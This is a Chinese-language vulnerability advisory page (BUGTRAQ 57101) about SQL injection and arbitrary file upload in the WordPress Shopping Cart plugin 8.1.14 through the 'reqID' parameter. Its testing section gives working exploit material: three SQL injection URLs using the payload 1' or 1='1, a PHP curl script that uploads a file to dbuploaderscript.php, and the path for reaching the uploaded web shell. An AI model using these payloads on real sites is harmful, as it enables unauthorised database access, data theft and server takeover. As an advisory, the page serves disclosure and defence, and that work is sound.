发布日期：2012-12-30
更新日期：2013-01-04

受影响系统：

WordPress Shopping Cart 8.1.14

描述：

---

BUGTRAQ  ID: 57101

WordPress Shopping Cart插件是购物车系统，具有电子交易功能和管理工具。

WordPress Shopping Cart插件内存在安全漏洞，没有正确验证wp-content/plugins/levelfourstorefront/scripts/administration/backup.php, wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php内的 "reqID" 参数值的合法性，可导致任意SQL代码执行和任意文件上传。

<*来源：Sammy Forgit
  
  链接：http://packetstormsecurity.com/files/119217/wplevelfour-sqlshell.txt
        http://www.securelist.com/en/advisories/51690
        http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-shopping-cart-multiple-vulnerability.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

## Exploit SQL injection :

Database Wordpress :
http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1

Account XLS :
http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1' or 1='1

Subscriber XLS :
http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1


## Exploit Arbitrary File Upload:

PostShell.php
<?php

$uploadfile = "lo.php";
      $force = "http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php";
      $ch = curl_init("$force");
      curl_setopt($ch, CURLOPT_POST, true);  
      curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('Filedata'=>"@$uploadfile",
            'reqID'=>"1'or 1='1"));
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
      $postResult = curl_exec( $ch );
      curl_close($ch);
      
print "$postResult";

?>


Shell Access :
http://localhost/wordpress/wp-content/plugins/levelfourstorefront/products/lo.php

lo.php
<?php
phpinfo();
?>

# Site : 1337day[.]com Inj3ct0r Exploit Database

建议：

---

厂商补丁：

WordPress
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://wordpress.org/extend/plugins/levelfourstorefront/

浏览次数：4816
严重程度：0（网友投票）